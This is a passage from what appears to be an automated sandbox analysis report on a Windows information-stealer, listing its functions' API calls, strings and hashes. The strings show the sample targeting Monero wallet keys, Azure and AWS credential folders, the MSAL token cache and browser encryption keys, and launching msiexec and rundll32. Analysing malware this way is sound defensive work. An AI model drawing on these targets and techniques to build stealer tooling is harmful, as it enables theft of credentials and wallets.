                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 3792ad7c753a2e868f6ddc64582a1e1b920280f5bfcaaa2b32b80d16c190e012
                                      • Instruction ID: 6eb110d2ca0670eb9689b181b113010355766c4ce93d567362a3276ddb089de5
                                      • Opcode Fuzzy Hash: 3792ad7c753a2e868f6ddc64582a1e1b920280f5bfcaaa2b32b80d16c190e012
                                      • Instruction Fuzzy Hash: 9DE1227291020AABCB04EBA0DD9AEEEBB78BF54301F104158F147B7091DE75AE45CF66
                                      Function 0052C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 0053A920: lstrcpy.KERNEL32(00000000,?), ref: 0053A972
                                        • Part of subcall function 0053A920: lstrcat.KERNEL32(00000000), ref: 0053A982
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                        • Part of subcall function 0053A9B0: lstrlen.KERNEL32(?,00F199F0,?,\Monero\wallet.keys,00540E17), ref: 0053A9C5
                                        • Part of subcall function 0053A9B0: lstrcpy.KERNEL32(00000000), ref: 0053AA04
                                        • Part of subcall function 0053A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0053AA12
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F1D4B8,00000000,?,0054144C,00000000,?,?), ref: 0052CA6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0052CA89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0052CA95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0052CAA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0052CAD9
                                      • StrStrA.SHLWAPI(?,00F1D470,00540B52), ref: 0052CAF7
                                      • StrStrA.SHLWAPI(00000000,00F1D5A8), ref: 0052CB1E
                                      • StrStrA.SHLWAPI(?,00F1DC40,00000000,?,00541458,00000000,?,00000000,00000000,?,00F198B0,00000000,?,00541454,00000000,?), ref: 0052CCA2
                                      • StrStrA.SHLWAPI(00000000,00F1DA80), ref: 0052CCB9
                                        • Part of subcall function 0052C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0052C871
                                        • Part of subcall function 0052C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0052C87C
                                      • StrStrA.SHLWAPI(?,00F1DA80,00000000,?,0054145C,00000000,?,00000000,00F198F0), ref: 0052CD5A
                                      • StrStrA.SHLWAPI(00000000,00F199B0), ref: 0052CD71
                                        • Part of subcall function 0052C820: lstrcat.KERNEL32(?,00540B46), ref: 0052C943
                                        • Part of subcall function 0052C820: lstrcat.KERNEL32(?,00540B47), ref: 0052C957
                                        • Part of subcall function 0052C820: lstrcat.KERNEL32(?,00540B4E), ref: 0052C978
                                      • lstrlen.KERNEL32(00000000), ref: 0052CE44
                                      • CloseHandle.KERNEL32(00000000), ref: 0052CE9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 6679010666b1f445f61fa35f5ba82b30f4574e4d1271a7cc36611eac160173b8
                                      • Instruction ID: 16152153b1a04ed4fc5b59d5ff93100734fa677289a33c1f1f963c7c245597cd
                                      • Opcode Fuzzy Hash: 6679010666b1f445f61fa35f5ba82b30f4574e4d1271a7cc36611eac160173b8
                                      • Instruction Fuzzy Hash: 23E10A72900109ABDB15EBA0DC9AFEEBB78BF94300F004159F14677191EF746A4ACF66
                                      Function 00538320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • RegOpenKeyExA.ADVAPI32(00000000,00F1B0C8,00000000,00020019,00000000,005405B6), ref: 005383A4
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00538426
                                      • wsprintfA.USER32 ref: 00538459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0053847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0053848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00538499
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 18f332cdf1c112b14c6630e6197a9f6781d533606cfa31189422c6f22c1234c9
                                      • Instruction ID: bc30d0f89d0d9d99abf317a596355f90192c2a17e66682c17d3e0031ada20ddc
                                      • Opcode Fuzzy Hash: 18f332cdf1c112b14c6630e6197a9f6781d533606cfa31189422c6f22c1234c9
                                      • Instruction Fuzzy Hash: FC811E71910219ABDB28DB50CC95FEABBB8FF48700F008699F14AA6180DF756B85CF95
                                      Function 00534D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534DB0
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00534DCD
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 0053492C
                                        • Part of subcall function 00534910: FindFirstFileA.KERNEL32(?,?), ref: 00534943
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534E3C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00534E59
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FDC), ref: 00534971
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,00540FE0), ref: 00534987
                                        • Part of subcall function 00534910: FindNextFileA.KERNEL32(000000FF,?), ref: 00534B7D
                                        • Part of subcall function 00534910: FindClose.KERNEL32(000000FF), ref: 00534B92
                                      • lstrcat.KERNEL32(?,00000000), ref: 00534EC8
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00534EE5
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 005349B0
                                        • Part of subcall function 00534910: StrCmpCA.SHLWAPI(?,005408D2), ref: 005349C5
                                        • Part of subcall function 00534910: wsprintfA.USER32 ref: 005349E2
                                        • Part of subcall function 00534910: PathMatchSpecA.SHLWAPI(?,?), ref: 00534A1E
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,00F1E938), ref: 00534A4A
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,00540FF8), ref: 00534A5C
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,?), ref: 00534A70
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,00540FFC), ref: 00534A82
                                        • Part of subcall function 00534910: lstrcat.KERNEL32(?,?), ref: 00534A96
                                        • Part of subcall function 00534910: CopyFileA.KERNEL32(?,?,00000001), ref: 00534AAC
                                        • Part of subcall function 00534910: DeleteFileA.KERNEL32(?), ref: 00534B31
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: df36f711d821cbe9cc88f22b8bb33d641757d7a1fd85cb8301b580cd8700eb9d
                                      • Instruction ID: aa90f98be3981957e8cf0431b1b18d16e22a1bd38feac45c5cd7839fd9f256b6
                                      • Opcode Fuzzy Hash: df36f711d821cbe9cc88f22b8bb33d641757d7a1fd85cb8301b580cd8700eb9d
                                      • Instruction Fuzzy Hash: CB41867A94031967D714F760EC5BFED7B38BB64704F004494B28A660C1EEB5ABC88F96
                                      Function 00539010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0053906C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: 5d150a3cc00f75c8e6bdd78abc6c26aec47421425e5afed4e48ca074f9fa21da
                                      • Instruction ID: e52f7f13cdf3891c2552905f2eb40a64e4922d814677acf2fc39980f2c53f3cf
                                      • Opcode Fuzzy Hash: 5d150a3cc00f75c8e6bdd78abc6c26aec47421425e5afed4e48ca074f9fa21da
                                      • Instruction Fuzzy Hash: DB71C0B5910209BBDB04DBE4DC89FDEBBB9BF88700F148508F516A7290DB78A905CF65
                                      Function 00532E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 005331C5
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 0053335D
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 005334EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 00f09f62d0a83d9dcd63bd57daa9fb609b8620dac542f412ebf827f84aed0593
                                      • Instruction ID: 8d616abbcfb516af8d79177a6c90e695315b8df650f1e76d37dc20120e09d47d
                                      • Opcode Fuzzy Hash: 00f09f62d0a83d9dcd63bd57daa9fb609b8620dac542f412ebf827f84aed0593
                                      • Instruction Fuzzy Hash: D2121172810109AADB09FBA0DC9AFEDBB38BF94300F504159F54676195EF742B4ACF92
                                      Function 005352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0053A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0053A7E6
                                        • Part of subcall function 00526280: InternetOpenA.WININET(00540DFE,00000001,00000000,00000000,00000000), ref: 005262E1
                                        • Part of subcall function 00526280: StrCmpCA.SHLWAPI(?,00F1E748), ref: 00526303
                                        • Part of subcall function 00526280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00526335
                                        • Part of subcall function 00526280: HttpOpenRequestA.WININET(00000000,GET,?,00F1DF48,00000000,00000000,00400100,00000000), ref: 00526385
                                        • Part of subcall function 00526280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005263BF
                                        • Part of subcall function 00526280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005263D1
                                        • Part of subcall function 0053A8A0: lstrcpy.KERNEL32(?,00540E17), ref: 0053A905
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00535318
                                      • lstrlen.KERNEL32(00000000), ref: 0053532F
                                        • Part of subcall function 00538E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00538E52
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00535364
                                      • lstrlen.KERNEL32(00000000), ref: 00535383
                                      • lstrlen.KERNEL32(00000000), ref: 005353AE
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 4f53338f689fe2d108466b78a3ebc77cf186dfc2b76195abdc03fe6a6c5351ac
                                      • Instruction ID: 7d0991ef6c1cac6bb66c00094d0c923c1840564bf2053e19476d42c6be2e88a3
                                      • Opcode Fuzzy Hash: 4f53338f689fe2d108466b78a3ebc77cf186dfc2b76195abdc03fe6a6c5351ac
                                      • Instruction Fuzzy Hash: 09510F7091014AABCB14FF60DD9AAEE7F79BF90300F504018F44A6B591EF346B45DB62
                                      Function 005312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000A23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768104494.0000000000A24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768489341.0000000000BC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1768624344.0000000000BC6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_520000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 8511afa1561263e19aa7d42d56bb4adfb37a60a8aeeb2a4eda91e4f6eac73956
                                      • Instruction ID: e40f858b2c6a049f5cb0368279fb87e28e0bae6f3cc714b95c29c23a20d595b4
                                      • Opcode Fuzzy Hash: 8511afa1561263e19aa7d42d56bb4adfb37a60a8aeeb2a4eda91e4f6eac73956
                                      • Instruction Fuzzy Hash: 13C1A8B6900219ABCB14EF60DC8DFEA7B78BBA4304F104598F50AA7141DF74AA85CF95
                                      Function 00534280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00538DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00538E0B
                                      • lstrcat.KERNEL32(?,00000000), ref: 005342EC
                                      • lstrcat.KERNEL32(?,00F1E620), ref: 0053430B
                                      • lstrcat.KERNEL32(?,?), ref: 0053431F
                                      • lstrcat.KERNEL32(?,00F1D488), ref: 00534333
                                        • Part of subcall function 0053A740: lstrcpy.KERNEL32(00540E17,00000000), ref: 0053A788
                                        • Part of subcall function 00538D90: GetFileAttributesA.KERNEL32(00000000,?,00521B54,?,?,0054564C,?,?,00540E1F), ref: 00538D9F
                                        • Part of subcall function 00529CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00529D39
                                        • Part of subcall function 005299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005299EC
                                        • Part of subcall function 005299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00529A11
                                        • Part of subcall function 005299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00529A31
                                        • Part of subcall function 005299C0: ReadFile.KERNEL32(000000FF,?,00000000,0052148F,00000000), ref: 00529A5A
                                        • Part of subcall function 005299C0: LocalFree.KERNEL32(0052148F), ref: 00529A90
                                        • Part of subcall function 005299C0: CloseHandle.KERNEL32(000000FF), ref: 00529A9A
                                        • Part of subcall function 005393C0: GlobalAlloc.KERNEL32(00000000,005343DD,005343DD), ref: 005393D3
                                      • StrStrA.SHLWAPI(?,00F1E5F0), ref: 005343F3
                                      • GlobalFree.KERNEL32(?), ref: 00534512
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529AEF
                                        • Part of subcall function 00529AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00524EEE,00000000,?), ref: 00529B01
                                        • Part of subcall function 00529AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NR,00000000,00000000), ref: 00529B2A
                                        • Part of subcall function 00529AC0: LocalFree.KERNEL32(?,?,?,?,00524EEE,00000000,?), ref: 00529B3F
                                      • lstrcat.KERNEL32(?,00000000), ref: 005344A3
                                      • StrCmpCA.SHLWAPI(?,005408D1), ref: 005344C0
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 005344D2
                                      • lstrcat.KERNEL32(00000000,?), ref: 005344E5
                                      • lstrcat.KERNEL32(00000000,00540FB8), ref: 005344F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1766358314.0000000000521000.00000040.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                      • Associated: 00000000.00000002.1766321931.0000000000520000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.00000000005DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.0000000000602000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766358314.000000000076A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.000000000077E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.0000000000904000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1766656371.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
